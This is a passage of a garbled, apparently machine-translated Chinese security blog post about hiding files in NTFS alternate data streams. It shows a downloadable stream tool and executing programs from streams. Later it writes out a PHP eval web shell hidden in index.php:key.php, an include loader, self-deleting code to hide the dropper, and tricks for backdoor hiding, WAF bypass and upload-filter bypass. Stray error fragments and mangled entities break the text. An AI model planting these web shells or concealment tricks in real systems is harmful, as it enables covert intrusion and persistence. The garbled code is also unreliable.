从对等方接收数据时失败 3.包含隐藏信息的文件仍可以继续隐藏其他内容。与上面的示例相反，我们仍然可以使用命令echo mstlab1＆gt;＆gt; mst.txt: test1.txt为mst.txt创建一个新的隐藏流文件。命令notepad mst.txt: test1.txt将在打开后找到mstlab1信息，mstlab仍然存在于mst.txt: test.txt不受影响。 所以这里的主机mst.txt被test.txt和test1.txt成功寄生，这里的微妙关系很明显，主机消失，寄生物消失。 NTFS特点和原理分析： 特色1： 实验室工具下载：https://github.com/wangyongxina/filestreams/blob/master/Release/Release.7z 工具说明： 创建创建文件流 枚举枚举文件流 删除删除文件流 Write将内容写入文件流 将添加文件附加到文件流 启动文件流的内容 转储读取文件流的内容 让我们将上一步回到零并重新访问mst.txt： 此处的默认文件流验证第一个句子，默认为使用指定的文件流。 在实验开始时，首先我们使用FileStreams.exe创建一个文件流vkey： FileStreams.exe创建mst.txt vkey 然后将内容写入文件流vkey： FileStreams.exe写入mst.txt vkey内容 然后看一下文件流vkey的内容： FileStreams.exe dump mst.txt vkey 14 14这里来自哪里，我相信你可以理解聪明。 （文件流vkey大小14） 所以在一开始，文件流可以用来启动程序，让我们试试： 1.将文件添加到文件流vkey： FileStreams.exe追加mst.txt vkey C: \ Users \ gh0stkey \ Desktop \ test \ FileStreams.exe 2.查看文件流vkey的内容，这里看前100个字节的内容： FileStreams.exe dump mst.txt vkey 100 3.执行文件流vkey： 文件C: \ Users \ gh0stkey \ Desktop \ test \ FileStreams.exe已成功执行。 特色2 自动创建空文件： 主机自动创建，然后寄生。 在没有原始文件的情况下创建文件流会自动创建一个空文件。 原理分析： 好的，现在我们初步了解了文件流的特性。我们来看看NTFS文件流的实现原理： 如文件大小，文件创建时间，文件修改时间，文件名，文件内容等都被组织成要存储的属性，NTFS定义了一系列文件属性： 从对等方接收数据时失败 Exec（'echo'＆lt;php @eval（$ _ POST [key]）;＆gt;'＆gt;＆gt; index.php: key.php'）; 直接写一个句子到key.php的文件流。 其次，文件流不能直接执行，但PHP可以使用include函数，因此生成第二段代码： $ key=＆lt;＆lt;＆lt; key Echo'＆lt;php包括'index.php: key.php';＆gt;'＆gt;＆gt; a.php 键; EXEC（$键）; 最后，为了找不到删除文件本身，代码出来了： $ url=$ _SERVER ['PHP_SELF']; $ filename=substr（$ url，strrpos（$ url，'/'）+ 1）; @unlink（$文件名）; 软件后门隐藏： 使用功能1编写一段代码以在后台自动运行此文件流。 ByPass WAF： 测试下一个WAF仍然可以被绕过。 更多鸡肉： 需要包含一个文件。 当然，一些限制限制寄生虫获得主权： 使用下面的默认流替换功能上传名为1.php:的文件，绕过后缀名称限制。 默认流替换： 默认流也是主机自己的，可以完全吞噬主机并成为主机。 这种方法是常规的理解，非常有趣。 如上所示，我们直接执行echo xxxx＆gt;＆gt; 1.txt: 您可以替换默认流： 当然，如果主机不存在，将创建主机并且主机将被吞没以成为主机。 此方法完美地用于有限的命令执行。 总结一下 原始文件=主机，文件流=寄生虫。亲爱的朋友们，在本文的基础上，继续深入研究，将文件流应用于各种操作，并创建一个“古怪”的流。 本文《文件寄生——寻找宿主的不归路(NTFS文件流实际应用)”》由作者Mister Security进攻与防御实验室Www.Hi-OurLife.Com @ gh0stkey原创贡献安全脉冲，安全脉冲发表本文，如需转载，请联系安全脉冲授权;请不要擅自转载。